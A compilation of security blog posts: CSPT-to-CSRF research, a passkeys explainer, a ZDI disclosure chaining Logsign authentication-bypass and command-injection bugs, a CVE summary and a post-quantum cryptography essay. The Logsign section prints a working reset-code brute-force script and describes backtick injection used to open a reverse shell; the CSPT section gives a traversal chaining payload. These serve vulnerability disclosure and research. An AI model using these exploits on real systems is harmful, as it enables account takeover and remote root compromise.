3 July 2024 - Vulnerability Research

What’s new in the MSRC Report Abuse Portal and API

The Microsoft Security Response Center (MSRC) has always been at the forefront of addressing cyber threats, privacy issues, and abuse arising from Microsoft Online Services. Building on our commitment, we have introduced several key updates to the Report Abuse Portal and API, which will significantly improve the way we handle and respond to abuse reports.

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF

1 July 2024 at 22:00


To provide users with a safer browsing experience, the IETF proposal named “Incrementally Better Cookies” set in motion a few important changes to address Cross-Site Request Forgery (CSRF) and other client-side issues. Soon after, Chrome and other major browsers implemented the recommended changes and introduced the SameSite attribute. SameSite helps mitigate CSRF, but does that mean CSRF is dead?

While auditing major web applications, we realized that Client-Side Path Traversal (CSPT) can actually be leveraged to resuscitate CSRF, to the joy of all pentesters.

This blog post is a brief introduction to my research. The detailed findings, methodologies, and in-depth analysis are available in the whitepaper.

This research introduces the basics of Client-Side Path Traversal, presenting sources and sinks for Cross-Site Request Forgery. To demonstrate the impact and novelty of our discovery, we showcased vulnerabilities in major web messaging applications, including Mattermost and Rocket.Chat, among others.

Finally, we are releasing a Burp extension to help discover Client-Side Path-Traversal sources and sinks.

Thanks to the Mattermost and Rocket.Chat teams for their collaboration and authorization to share this.

Client-Side Path Traversal (CSPT)

Every security researcher should know what a path traversal is. This vulnerability gives an attacker the ability to use a payload like ../../../../ to read data outside the intended directory. Unlike server-side path traversal attacks, which read files from the server, client-side path traversal attacks focus on exploiting this weakness in order to make requests to unintended API endpoints.

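As a minimal illustration of the mechanism, the following sketch mimics a front end that concatenates a user-controlled identifier into an API path; the endpoint names are invented for the example, and the point is simply that ../ segments are resolved before the request reaches the intended endpoint:

    # Minimal illustration of client-side path traversal (hypothetical endpoints).
    # Mirrors front-end code doing fetch("/api/messages/" + id) with an
    # attacker-controlled id.
    import posixpath

    def resolved_api_path(user_id):
        return posixpath.normpath("/api/messages/" + user_id)

    print(resolved_api_path("1337"))
    # /api/messages/1337
    print(resolved_api_path("../../api/admin/promote"))
    # /api/admin/promote  <- the request is rerouted to a different endpoint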

While this class of vulnerabilities is very popular on the server side, only a few occurrences of Client-Side Path Traversal have been widely publicized. The first reference we found was a bug reported by Philippe Harewood in the Facebook bug bounty program. Since then, we have found only a few public references to Client-Side Path Traversal.

Client-Side Path Traversal has been overlooked for years. While many consider it a low-impact vulnerability, it can actually be used to force an end user to execute unwanted actions on a web application.

Client-Side Path Traversal to Perform Cross-Site Request Forgery (CSPT2CSRF)

This research evolved from exploiting multiple Client-Side Path Traversal vulnerabilities during our web security engagements. However, we realized there was a lack of documentation and knowledge to understand the limits and potential impacts of using Client-Side Path Traversal to perform CSRF (CSPT2CSRF).

Source

While working on this research, we identified a common bias: researchers may think that the user input has to be in the front end. However, as with XSS, any user input can lead to CSPT (think DOM-based, reflected, or stored):

  • URL fragment
  • URL Query
  • Path parameters
  • Data injected in the database

When evaluating a source, you should also consider whether user interaction is needed to trigger the vulnerability or whether it fires as soon as the page is loaded. This complexity will affect the final severity of the vulnerability.

Sink

The CSPT will reroute a legitimate API request. Therefore, the attacker may not have control over the HTTP method, headers, and request body.

All these restrictions are tied to a source. Indeed, the same front end may have different sources that perform different actions (e.g., GET/POST/PATCH/PUT/DELETE).

Each CSPT2CSRF needs to be described (source and sink) to identify the complexity and severity of the vulnerability.

As an attacker, we want to find all impactful sinks that share the same restrictions. This can be done with:

  • API documentation
  • Source code review
  • Semgrep rules
  • Burp Suite Bambda filter


CSPT2CSRF with a GET Sink

Some scenarios of exploiting CSPT with a GET sink exist:

  • Using an open redirect to leak sensitive data associated with the source
  • Using an open redirect to load malicious data in order to trigger an XSS

However, open redirects are now hunted by many security researchers, and finding an XSS in a front end using a modern framework may be hard.

That said, during our research, even when state-changing actions weren’t implemented directly behind a GET sink, we were frequently able to exploit them via CSPT2CSRF without either of the two prerequisites above.

In fact, it is often possible to chain a CSPT2CSRF with a GET sink into another, state-changing CSPT2CSRF.


1st primitive: GET CSPT2CSRF:

  • Source: id param in the query
  • Sink: GET request on the API

2nd primitive: POST CSPT2CSRF:

  • Source: id from the JSON data
  • Sink: POST request on the API

To chain these primitives, a GET sink gadget must be found, and the attacker must control the id of the returned JSON. Sometimes this may be directly authorized by the back end, but the most common gadget we found was abusing file upload/download features. Indeed, many applications expose file upload features in their API. An attacker can upload a JSON file with a manipulated id and point the GET sink at this content to trigger the CSPT2CSRF with a state-changing action.
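
As a rough illustration of the attacker-side preparation for such a chain, consider the sketch below; every endpoint name is invented, and the real gadgets are application-specific (the Mattermost case is detailed in the whitepaper):

    # Hypothetical illustration of chaining a GET CSPT2CSRF into a POST CSPT2CSRF.
    # All endpoint names are invented; real gadgets depend on the application.
    import json
    from urllib.parse import quote

    # Step 1: upload a JSON document whose "id" field carries a path-traversal
    # payload pointing at a state-changing endpoint (later consumed by the POST sink).
    malicious_document = json.dumps({"id": "../../users/me/roles"})
    uploaded_file_id = "ATTACKER_FILE_ID"  # returned by the file upload API

    # Step 2: craft the victim link. The query parameter reroutes the front end's
    # GET sink so that it fetches the attacker's JSON instead of the expected object.
    traversal_to_upload = f"../../files/{uploaded_file_id}/download"
    victim_url = "https://target.example/app/view?id=" + quote(traversal_to_upload, safe="")
    print(victim_url)
    # When the victim opens the link, the front end GETs the attacker-controlled
    # JSON, reads its "id" field, and issues the second, state-changing request.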

In the whitepaper, we explain this scenario with an example in Mattermost.

Sharing with the Community

This research was presented last week by Maxence Schmitt (@maxenceschmitt) at OWASP Global Appsec Lisbon 2024. The slides can be found here.

This blog post is just a glimpse of our extensive research. For a comprehensive understanding and detailed technical insights, please refer to the whitepaper.

Along with this whitepaper, we are releasing a Burp extension to find Client-Side Path Traversals.


In Conclusion

We feel CSPT2CSRF is overlooked by many security researchers and unknown by most front-end developers. We hope this work will highlight this class of vulnerabilities and help both security researchers and defenders to secure modern applications.

More information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at [email protected] for more information on how we can help your organization “Build with Security”.

The End of Passwords? Embrace the Future with Passkeys.

2 July 2024 at 07:00
By Alexandre Baratin

Yesterday, unexpectedly, my personal Google account suggested using passkeys for login. This is great news: passkeys are a game-changer for cyber security because they could solve one of its biggest headaches, password use.


The problem with passwords.

For decades, we have struggled with passwords as an authentication tool. They are a conceptually weak solution for digital security and far more prone to abuse than most people realize. The intense use of digital applications forces users to juggle hundreds or thousands of passwords, and human behaviour leads to poor practices: password re-use increases the risk of broad breaches when criminals steal a single password, while longer and more complex password requirements are circumvented by people keeping paper lists of passwords. The universal use of authentication to access a wide array of personal and business applications has created a situation where, to stay secure, a password manager and multi-factor authentication (MFA) are indispensable for critical services.
According to Google Cloud’s 2023 Threat Horizons Report, 86% of security breaches involve stolen credentials. IBM estimates the global average cost of a security breach was $4.45 million in 2023.
So how can we structurally eliminate the dangers of relying on a single password per service and trust something more resilient, for both our personal and professional digital lives?

Why passkeys are a game-changer.

The FIDO (Fast IDentity Online) Alliance, created in 2013, paved the way in 2018 for the introduction of FIDO2 keys. The size of a USB stick, these keys safely store a certificate, allowing authentication on any kind of device (laptops, smartphones, etc.). They are best known through YubiKeys, the most famous product leveraging this technology. These products have a good reputation and reasonable adoption among users and institutions aware of the dangers of passwords.
But while these keys offer some of the best protection available on the market, the need to buy and manage a separate token is a showstopper for many individuals, even though they use passwords daily. Passkeys offer a much better alternative.
So, why am I so enthusiastic about passkeys? Because they solve all the issues associated with passwords for both security professionals and everyday users.

Here’s how passkeys shine:

  • Enhanced Security: Passkeys are resistant to phishing and brute-force attacks. They are complex in structure and length and cannot be guessed.
  • Privacy: The private key never leaves the user’s device, reducing the risk of theft.
  • Convenience: No need to remember complex passwords.

What exactly are passkeys?

Do not confuse passkeys with passphrases. Passphrases, like passwords, are secrets you need to remember and enter manually. They are just longer passwords. Passkeys, however, are fundamentally different.
Passkeys rely on asymmetric cryptography, meaning they consist of:

  • A Private Key: Securely stored on the user’s device.
  • A Public Key: Shared with the server to verify the user’s identity.
  • A Challenge-Response Mechanism: Used to authenticate the user without exposing the private key.

Here is a simplified description of the logon process.

The passkeys logon process (source: Bitwarden.com).
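
A toy sketch of the underlying challenge-response idea, using Ed25519 keys from the Python cryptography library purely for illustration (real passkeys use the WebAuthn and CTAP protocols, with the key held and attested by the authenticator):

    # Toy illustration of challenge-response authentication (not WebAuthn itself).
    import os
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

    # Registration: the device generates a key pair and shares only the public key.
    device_private_key = Ed25519PrivateKey.generate()        # never leaves the device
    registered_public_key = device_private_key.public_key()  # stored by the server

    # Login: the server sends a fresh random challenge...
    challenge = os.urandom(32)

    # ...the device signs it locally (after a PIN or biometric unlock)...
    signature = device_private_key.sign(challenge)

    # ...and the server verifies the signature with the stored public key.
    try:
        registered_public_key.verify(signature, challenge)
        print("login accepted")
    except InvalidSignature:
        print("login rejected")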

The private key is the crucial element to secure, often stored in a password vault or, even better, in the TPM chip of your computer. Any modern smartphone or computer offers a way to securely store a private key, making it straightforward to use passkeys. As a fallback, password managers offer a reliable storage solution.

Built on open standards.

Passkeys are based on open standards developed by the FIDO Alliance. Security keys like YubiKey are also based on those standards. However, earlier versions required buying a physical key and were often complicated to initialize. For companies, the cost of buying and managing large numbers of physical keys was also a barrier.
Modern passkeys no longer require a token but can be installed as software. Together with the widespread adoption of MFA, they offer a truly passwordless solution, compatible with state-of-the-art devices, and therefore easy to obtain and install.

For both personal and corporate use.

Tech giants like Google, Microsoft, Apple, Amazon, and Meta are now adopting passkeys. For users, logging in will be as simple as validating the connection on their phone, using a PIN or biometric authentication.
For companies, passkeys and FIDO standards represent an opportunity to enhance security by reducing the risks associated with traditional password use and implementing a passwordless strategy. Passkeys are easy to use, easy to deploy, cost-effective, and robust. All major cloud vendors provide guidance on implementing passkeys or any other passwordless solution based on FIDO standards, and Microsoft provides guidance on Active Directory implementation.
One question remains: where to keep your secrets?
When you use passkeys, keeping your certificates safe is crucial. You might be wondering where to put that secret, right? After all, you don’t want anyone else getting their hands on your private key. The good thing is that you have plenty of options! The not-so-good thing is that they all have their pros and cons. As always, you will have to balance security and convenience.

The overview below shows your alternatives for storing your passkeys:

  • TPM chip of your computer. Pros: high security, protection against hardware and software attacks with the integrated TPM chip. Cons: less flexible for multi-device access.
  • Smartphone. Pros: convenient and mobile, with dedicated security modules (Apple Secure Enclave or Android Trust Zone). Cons: issues if lost or stolen without backups.
  • IAM (Identity and Access Management) solutions (Google Cloud IAM, Azure AD, AWS IAM). Pros: centralized management, advanced security, multi-factor support. Cons: complex setup and management, dependency on cloud services.
  • Password managers (1Password, Dashlane, Bitwarden, …). Pros: flexibility, multi-device access, robust encryption. Cons: depends on the security of the manager, risk of compromise.
  • Hardware security keys (YubiKey, Google Titan). Pros: maximum security, portable, compatible with many services. Cons: need to carry the key, risk of loss or theft.

A natural choice for a company is to leverage an existing IAM solution. For instance, when using Microsoft Entra ID, the built-in features enable the technology. For Apple users, there is a similar mechanism that works on both iOS and macOS.
I do not use YubiKeys yet, even though they would be the best option for storing my passkeys. Currently, I keep my passkeys in my favourite password manager, and I am hoping to change all my passwords soon!

The Future Norm?

Passkeys will become the new norm in a few years. Users will realize that passkeys simplify their lives, and companies and users alike will appreciate the reduced risk of breaches from phishing or brute-force attacks. However, building user trust in passkeys remains a challenge, just as it was for the adoption of password managers. Employers and providers of digital services should find effective ways to explain the importance and benefits of adopting passkeys, just as they previously advocated for the use of strong, complex passwords.

Looking ahead, passkeys will be particularly valuable in a quantum computing future. Although current passkeys do not yet use quantum-resistant cryptography, they offer a flexible and scalable solution. Updating and replacing passkeys will be significantly easier than replacing traditional passwords (finally, no more trying to generate and remember new secret passwords). Personally, I am adopting passkeys for every service that offers them as an option. At NVISO, we are encouraging customers to include a passwordless strategy in their zero-trust journey.

What about you? Is it the first time you are hearing about passkeys? Are you using them personally or have you seen companies successfully deploying them? Feel free to share your thoughts and questions in the comments below!


Alexandre Baratin

Alexandre Baratin is a Cyber Security Consultant active in the Cyber Security and Architecture team at NVISO. With a comprehensive background in IT and Cyber Security, he assists companies on their Cyber Security journey by enhancing security awareness, developing or refining GRC processes, and managing the security program through NVISO’s CISO as a Service offering.

Alexandre holds some of the most recognized certifications in IT, project management, cybersecurity, and cloud computing.

Getting Unauthenticated Remote Code Execution on the Logsign Unified SecOps Platform

1 July 2024 at 16:56

Earlier this year, the Trend Micro Zero Day Initiative (ZDI) acquired several vulnerabilities in the Logsign Unified SecOps Platform. These were all reported to the ZDI by Mehmet INCE (@mdisec) from PRODAFT.com. According to Logsign’s website:

Logsign provides comprehensive visibility and control of your data lake by allowing security analysts to collect and store unlimited data, investigate and detect threats, and respond automatically.

Logsign offers a single, unified whole security operation platform to alleviate the challenges associated with deploying multiple cybersecurity tools while reducing the costs and complexities that come with managing them individually.

Logsign runs as a Python-based web server. Users have the ability to interact with the web server through a variety of APIs. This blog looks at two separate vulnerabilities that can be combined to achieve remote, unauthenticated code execution on the web server via HTTP requests.

CVE-2024-5716 – Authentication Bypass

This vulnerability allows remote attackers to bypass authentication on affected installations of Logsign Unified SecOps Platform. The specific flaw exists within the password reset mechanism. The issue results from the lack of restrictions on excessive password reset attempts. An attacker can leverage this vulnerability to reset a user's password and bypass authentication on the system.

Anyone who can access TCP port 443 on the web server can request a password reset for a username. Once requested, the server sends a reset_code, which is a 6-digit number, to the email address associated with the username. Under normal operations, the user then uses the reset_code to reset their password.

The vulnerability is due to there being no rate limiting for requesting a reset_code. Since there is a default user named “admin”, an attacker can send multiple requests to reset the admin’s password until they brute force the correct reset_code. The attacker can then reset the admin’s password and log in as an administrator.

This vulnerability is located in /opt/logsign-api/api.py:

If we send a POST request to https://LOGSIGN_IP/api/settings/forgotpassword, the server will use this function to handle it.

       -- On line [1], it gets the username parameter from the POST request.
       -- On line [2], it checks if this user is not from_ldap, which is the default configuration. It then sets reset_code to random_int(6).

reset_code is set to a randomly-selected string of 6 decimal digits. Finally, the server stores the username and reset_code pair, and sends reset_code to the user's email.

If we send a POST request to https://LOGSIGN_IP/api/settings/verify_reset_code, the server will use the above function to handle it. If the username and reset_code are correct, the server responds with verification_code. Once in possession of this verification_code, the attacker will be permitted to reset the password.

On the line marked [1] in the code snippet above, we find a 3-minute time check. However, this is merely a check against the expiry time of the reset_code and not a rate limiter. An attacker can make numerous attempts at guessing the reset_code by calling verify_reset_code as many times as possible within the 3-minute window. If the attacker fails within these 3 minutes, they can send another request to https://LOGSIGN_IP/api/settings/forgotpassword and repeat the brute-force attack until they succeed. Since there are only 1 million possible values for reset_code, it is feasible to enumerate a significant proportion of all possible codes within the allotted time.

Once the attacker has guessed the reset_code and successfully obtained the verification_code, the attacker can call the reset_user_password endpoint, passing the verification_code:

When the server receives the correct username and verification_code, it allows the attacker to reset the user’s password.

The Exploit

The exploit is designed to use as many threads as possible to guess the reset_code.

We tested this with Logsign installed on a VMware virtual machine with 8 CPUs and 16GB of memory. Our attacker machine was capable of running 20 threads, which equated to roughly 15,000 attempts within 3 minutes.
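
A simplified, illustrative version of such a brute-force loop is sketched below; it is not the original exploit, and the JSON field names and success check are assumptions based on the behavior described above:

    # Illustrative sketch of the reset_code brute force (field names are assumed).
    import requests
    import urllib3
    from concurrent.futures import ThreadPoolExecutor

    urllib3.disable_warnings()  # the appliance typically uses a self-signed cert

    BASE = "https://LOGSIGN_IP"
    USERNAME = "admin"

    def request_reset_code():
        # Asks the server to generate a fresh 6-digit reset_code for the user.
        requests.post(f"{BASE}/api/settings/forgotpassword",
                      json={"username": USERNAME}, verify=False)

    def try_code(code):
        resp = requests.post(f"{BASE}/api/settings/verify_reset_code",
                             json={"username": USERNAME, "reset_code": code},
                             verify=False)
        # Assumed success indicator: the response carries a verification_code.
        return code if "verification_code" in resp.text else None

    request_reset_code()
    found = None
    with ThreadPoolExecutor(max_workers=20) as pool:
        for start in range(0, 1_000_000, 1000):           # work in small batches
            batch = [f"{i:06d}" for i in range(start, start + 1000)]
            for hit in pool.map(try_code, batch):
                if hit:
                    found = hit
                    break
            if found:
                break
    print("reset_code guessed:", found)
    # A real exploit must also request a fresh reset_code every 3 minutes, since
    # each code expires and the guessing then starts over.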

CVE-2024-5717 – Post-Auth Command Injection

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.

The specific flaw results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.

This vulnerability resides in /opt/logsign-api/settings_api.py:

If a user sends a POST request to https://LOGSIGN_IP/api/settings/demomode, the server will use this function to handle the request.

      -- On line [1], we see that the user needs to be authenticated to make this request. Hence this is a post-authentication vulnerability.

The POST data for this request is as follows:

      -- On line [2], the server takes the value of the list parameter from the POST data and passes it to escapeshellarg. It then takes the result of escapeshellarg, encloses it in single quotes, and adds it as a parameter to a shell command using string concatenation.

To a PHP programmer, it seems that the escapeshellarg() function sanitizes the list string and makes this code secure. Unfortunately, this is Python, and escapeshellarg() is not a built-in function in Python. (Note that Python ships with its own mechanisms for sanitizing shell parameters.) Instead, what appears here as escapeshellarg() is a custom implementation that can be trivially bypassed.

The escapeshellarg() function is defined in /opt/logsign-commons/python/logsign/commons/helpers.pyc. Using python_uncompyle6 to decompile helpers.pyc, we obtain the following Python script:

escapeshellarg() only escapes single quote characters! Therefore, we can use any command injection technique as long as it doesn’t rely on single quotes.

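To make the distinction concrete, the sketch below contrasts a single-quote-only filter (a stand-in for the flawed idea, not the decompiled Logsign code) with the shell-safe mechanisms Python actually ships with:

    # A naive single-quote-only filter versus Python's shell-safe alternatives.
    import shlex
    import subprocess

    user_value = "`id`"   # backtick payload, no single quotes required

    # Naive filtering (representative of the idea, not the decompiled code):
    # only single quotes are touched, so shell metacharacters pass through.
    naive = user_value.replace("'", "\\'")
    print(naive)                    # `id`  -- still dangerous in a shell string

    # Safer: produce a correctly quoted token...
    print(shlex.quote(user_value))  # '`id`'

    # ...or avoid the shell entirely by passing an argument vector.
    subprocess.run(["echo", user_value])  # argument is never shell-interpreted
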
This command injection works only once. If you want to subsequently execute another command, you need to first issue a request changing enable back to false. Then you can send the first request again to perform another command injection.

The Exploit

The exploit for this vulnerability is relatively simple. We will use backticks as a means of shell command injection, since this does not require single quotes. We can execute any shell command we wish, provided that our command does not itself contain any single quotes.

Combining CVE-2024-5716 and CVE-2024-5717

While the command injection vulnerability is post-auth, we can combine it with the authentication bypass to make it a pre-auth code execution. We use CVE-2024-5716 to reset the admin’s password, then log in with the admin’s credentials and execute the command injection.

In this exploit, we use the command injection to get a reverse shell. We use a Python reverse shell, since Logsign installs Python by default.

Conclusion

Logsign patched these and other vulnerabilities with version 6.4.8. Combining these bugs shows why even post-authentication bugs are worth fixing. When paired with an authentication bypass, a post-auth bug becomes pre-auth relatively quickly. We have seen situations like this at Pwn2Own competitions, in which a vendor believed that the addition of authentication was sufficient for defense.

The authentication bypass vulnerability shown here is a textbook example of the problems that can arise when implementing your own authentication mechanism. (See Web Application Hacker’s Handbook, Chapter 6, Forgotten Password Functionality, Hack Step 5.)  The presence of this rudimentary vulnerability should prompt the vendor to perform a full audit of their software.

I hope you enjoyed this blog and remember not to be daunted by authentication. Until my next post, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

CVE-2024-39348

1 July 2024 at 10:57

Download of code without integrity check vulnerability in AirPrint functionality in Synology Router Manager (SRM) before 1.2.5-8227-11 and 1.3.1-9346-8 allows man-in-the-middle attackers to execute arbitrary code via unspecified vectors.
The vulnerability allows man-in-the-middle attackers to execute arbitrary code or access intranet resources via a susceptible version of Synology Router Manager (SRM).

Quantum is unimportant to post-quantum

1 July 2024 at 13:00

By Opal Wright

You might be hearing a lot about post-quantum (PQ) cryptography lately, and it’s easy to wonder why it’s such a big deal when nobody has actually seen a quantum computer. But even if a quantum computer is never built, new PQ standards are safer, more resilient, and more flexible than their classical counterparts.

Quantum computers are a big deal; just ask around, and you’ll get plenty of opinions. Maybe quantum computers are on the verge of destroying public-key cryptography as we know it. Or maybe cryptographically significant quantum computers are an impossible pipe dream. Maybe the end of public-key cryptography isn’t now, but it’s only two decades away. Or maybe we have another 50 or 60 years because useful quantum computers have been two decades away for three decades, and we don’t expect that to change soon.

These opinions and predictions on quantum computers lead to many different viewpoints on post-quantum cryptography as well. Maybe we need to transition to post-quantum crypto right now, as quickly as we can. Maybe post-quantum crypto is a pipe dream because somebody will find a way to use quantum computers to break new algorithms, too. Maybe a major world government already has a quantum computer but is keeping it classified.

The fact of the matter is, it’s hard to know when a cryptographically significant quantum computer will exist until we see one. We can guess, we can try to extrapolate based on the limited data we have so far, and we can hope for one outcome or the other. But we can’t know with certainty.

That’s okay, though, because quantum resistance isn’t the main benefit of post-quantum crypto.

Current research and standards work will result in safer, more resilient cryptographic algorithms based on a diverse set of cryptographic problems. These algorithms benefit from the practical lessons of the last 40 years and provide use-case flexibility. Doomsayers and quantum skeptics alike should celebrate.

All in one basket

People who are worried about quantum computers often focus on one point, and they’re absolutely right about it: almost all public-key cryptography in wide use right now could be broken with just a few uncertain-but-possible advances in quantum computing.

Loosely speaking, the most commonly-used public-key algorithms are based on three problems: factoring (RSA), finite field discrete logarithms (Diffie-Hellman), and elliptic curve discrete logarithms (ECDH and ECDSA). These are all special instances of a more general computational problem called the hidden subgroup problem. And quantum computers are good at solving the hidden subgroup problem. They’re really good at it. So good that, if somebody builds a quantum computer of what seems like a reasonable size to many researchers, they can do all manner of nasty things. They can read encrypted messages. They can impersonate trusted organizations online. They can even use it to build tools for breaking some forms of encryption without quantum computers.

But even if quantum computing never becomes powerful enough to break current public keys, the fear of the quantum doomsayers is based on a completely valid observation: the internet has put nearly all of its cryptographic eggs into the single basket of the hidden subgroup problem. If somebody can efficiently solve the hidden subgroup problem, whether it’s with quantum computers or classical computers, they will be able to break the vast majority of public-key cryptography used on the internet.

What often gets overlooked is that, for the last 40 years, the hidden subgroup basket has consistently proven less safe than we expected.

Advances in factoring and discrete logs

In the 1987 talk “From Crossbows to Cryptography: Techno-Thwarting the State,” Chuck Hammill discussed RSA keys with 200 digits, or about 664 bits, saying that the most powerful supercomputers on earth wouldn’t be able to factor such a number in 100 years. The Unix edition of PGP 1.0 supported 992-bit RSA keys as its highest security level, saying the key size was “military grade.”

Nowadays, formulas provided by the National Institute of Standards and Technology (NIST) suggest that a 664-bit key offers only about 65 bits of security and is firmly within the reach of motivated academic researchers. A 992-bit key offers only about 78 bits of security and is speculated to be within reach of intelligence agencies.

(The smallest key size supported in PGP 1.0, 288 bits, can be broken in about 10 minutes on a modern desktop computer using readily available software like msieve. “Commercial grade” keys were 512 bits, which can be factored using AWS in less than a day for under $100.)

Ever-increasing key sizes

In response to advances in factoring and discrete logarithm algorithms over the years, we’ve responded by doing the only thing we really knew how to do: increasing key sizes. Typical RSA key sizes these days are 2048 to 4096 bits, roughly three to six times longer than Chuck Hammill suggested, and two to four times the length of what an early version of PGP called a “military grade” RSA key. The National Security Agency requires RSA keys no shorter than 3072 bits for classified data. The NIST formulas suggest that keys would need to be 15,360 bits long in order to match the security of a 256-bit AES key.

Finite field discrete logarithm key sizes have largely tracked RSA key sizes over the years. This is because the best algorithm for solving both problems is the same: index calculus using the general number field sieve (GNFS). There are some differences at the edges, but most of the hard work is the same. It’s worth pointing out that finite field discrete log cryptosystems have an additional downside: computing one discrete log in a finite field costs about the same as computing a lot of discrete logs.

Elliptic curves, which have become more popular over the last 15 years or so, have not seen the sort of changes in key size that happened with factoring and discrete log systems. Index calculus doesn’t translate well to elliptic curves, thank goodness, but elliptic curve discrete logarithms are an open area of research.

Implementation dangers

On top of the lack of problem diversity, another concern is that current algorithms are finicky and subject to subtle implementation failures.

Look, we’re Trail of Bits. We’re kinda famous for saying “fuck RSA,” and we say it mainly because RSA is full of landmines. Finite field Diffie-Hellman has subtle problems with parameter selection and weak subgroup attacks. Elliptic curve cryptosystems are subject to off-curve attacks, weak subgroup attacks, and attacks related to bad parameter selection.

Worse yet, every one of these algorithms requires careful attention to avoid timing side channel attacks!

Taken together, these pitfalls and subtle failure modes turn current public-key primitives into an absolute minefield for developers. It’s not uncommon for cryptography libraries to refer to their low-level functionality as “hazmat.” This is all before you move into higher-level protocols!

Many implementation concerns are at least partially mitigated through the use of good standards. Curve25519, for instance, was specifically designed for fast, constant-time implementations, as well as security against off-curve and weak subgroup attacks. Most finite field Diffie-Hellman key exchanges used for web traffic are done using a small number of standardized parameter sets that are designed to mitigate weak subgroup attacks. The ever-growing menagerie of known RSA attacks related to encryption and signing can (usually) be mitigated by using well-tested and audited RSA libraries that implement the latest standards.

Good standards have helped immensely, but they really just paper over some deeply embedded properties of these cryptosystems that make them difficult to use and dangerous to get wrong. Still, despite the consequences of errors and the availability of high-quality open-source libraries, Trail of Bits regularly finds dangerously flawed implementations of these algorithms in our code reviews.

What post-quantum crypto provides

So why is post-quantum crypto so much better? It’s instructive to look at the ongoing NIST post-quantum crypto standardization effort.

Diversity of problems

First of all, upcoming NIST standards are based on multiple mathematical problems:

  • CRYSTALS-KYBER, CRYSTALS-DILITHIUM, and Falcon are based on lattice problems: short integer solutions (SIS) and learning with errors (LWE) over various rings.
  • SPHINCS+ is based on the difficulty of second-preimage attacks for the SHA-256 and SHA-3 hash functions.

Additionally, NIST is attempting to standardize one or more additional signature algorithms, possibly based on different problems. Submissions include signature algorithms based on problems related to elliptic curve isogenies, error correcting codes, and multivariate quadratics.

By the time the next phase of standardization is over, we can expect to have algorithms based on at least three or four different mathematical problems. If one of the selected problems were to fall to advances in quantum or classical algorithms, there are readily-available replacements that are highly unlikely to be affected by attacks on the fallen cryptosystems.

Modern design

The post-quantum proposals we see today have been developed with the advantage of hindsight. Modern cryptosystem designers have seen the myriad ways in which current public-key cryptography fails in practice, and those lessons are being integrated into the fabric of the resulting designs.

Here are some examples:

  • Many post-quantum algorithms are designed to make constant-time implementations easy, reducing the risk of timing attacks.
  • Many algorithms reduce reliance on random number generators (RNGs) by extending nonce values with deterministic functions like SHAKE, preventing reliance on insecure RNGs.
  • Random sampling techniques for non-uniform distributions in the NIST finalists are fully specified and have been analyzed as part of the standardization effort, reducing the risk of attacks that rely on biased sampling.
  • Many post-quantum algorithms are fully deterministic in their input (meaning that encrypting or signing the same values with the same nonces will always produce the same results), reducing nonce reuse issues and the risk of information leakage if values are reused.
  • Many algorithms are designed to allow quick and easy generation of new keys, making it easier to provide forward secrecy.
  • Rather than inviting developers to dream up their own parameters, every serious proposal for a post-quantum cryptosystem lists a small set of secure parameterizations.

These are intentional, carefully-made decisions. Each is based on real-world failures that have shown up over the last 40 years or so. In cryptography, we often refer to these failure scenarios as “footguns” because they make it easy to shoot yourself in the foot; the newer designs go out of their way to make it difficult.

Use-case flexibility

With new algorithms come new trade-offs, and there are plenty to be found in the post-quantum standards. Hash-based signatures can run to 50 kilobytes, but the public keys are tiny. Code-based systems like McEliece have small ciphertexts, and decrypt quickly—but the public keys can be hundreds of kilobytes.

This variety of different trade-offs gives developers a lot of flexibility. For an embedded device where speed and bandwidth are important but ROM space is cheap, McEliece might be a great option for key establishment. For server farms where processor time is cheap but saving a few bytes of network activity on each connection can add up to real savings, NTRUSign might be a good option for signatures. Some algorithms even provide multiple parameter sets to address different needs: SPHINCS+ includes parameter sets for “fast” signatures and “small” signatures at the same security level.

The downside of post-quantum: Uncertainty

Of course, one big concern is that everybody is trying to standardize cryptosystems that are relatively young. What if the industry (or NIST) picks something that’s not secure? What if they pick something that will break tomorrow?

The idea can even feel frighteningly plausible. RAINBOW made it to the third round of the NIST PQC standardization effort before it was broken. SIKE made it to the (unplanned) fourth round before it was broken.

Some folks worry that a new standard could suffer the same fate as RAINBOW and SIKE, but not until after it has been widely adopted in industry.

But here’s a scary fact: we already run that risk. From a mathematical standpoint, there’s no proof that RSA moduli can’t be factored easily. There’s no proof that breaking RSA, as it’s used today, is equivalent to factoring (the opposite is true, in fact). It’s completely possible that somebody could publish an algorithm tomorrow that totally destroys Diffie-Hellman key exchanges. Somebody could publish a clever paper next month that shows how to recover private ECDSA keys.

An even scarier fact? If you squint a little, you’ll see that big breaks have already happened with factoring and finite field discrete logs. As mentioned above, advances with the GNFS have been pushing up RSA and Diffie-Hellman key sizes for over two decades now. Keys that would have been considered fine in 1994 are considered laughable in 2024. RSA and Diffie-Hellman from the old cipherpunk days are already broken. You just didn’t notice they’re broken because it took 30 years to happen, with keys getting bigger all the while.

I don’t mean to sound glib. Serious researchers have put in a lot of effort over the last few years to study new post-quantum systems. And, sure, it’s possible they missed something. But if you’re really worried about the possibility that somebody will find a way to break SPHINCS or McEliece or CRYSTALS-KYBER or FALCON, you can keep using current algorithms for a while. Or you could switch to a hybrid cryptography system, which marries post-quantum and pre-quantum methods together in a way that should stay secure as long as both are not broken.
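
As a rough sketch of the hybrid idea, a session key can be derived from both a classical and a post-quantum shared secret, so an attacker has to break both; in the example below the post-quantum share is a stand-in value rather than a real ML-KEM exchange:

    # Rough sketch of hybrid key derivation (the PQ share is a placeholder).
    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF
    from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

    # Classical share: an X25519 key agreement.
    alice = X25519PrivateKey.generate()
    bob = X25519PrivateKey.generate()
    classical_secret = alice.exchange(bob.public_key())

    # Post-quantum share: stand-in for the shared secret of an ML-KEM
    # encapsulation (use a real KEM implementation in practice).
    pq_secret = os.urandom(32)

    # The session key depends on both inputs; breaking only one is not enough.
    session_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                       info=b"hybrid key exchange example").derive(
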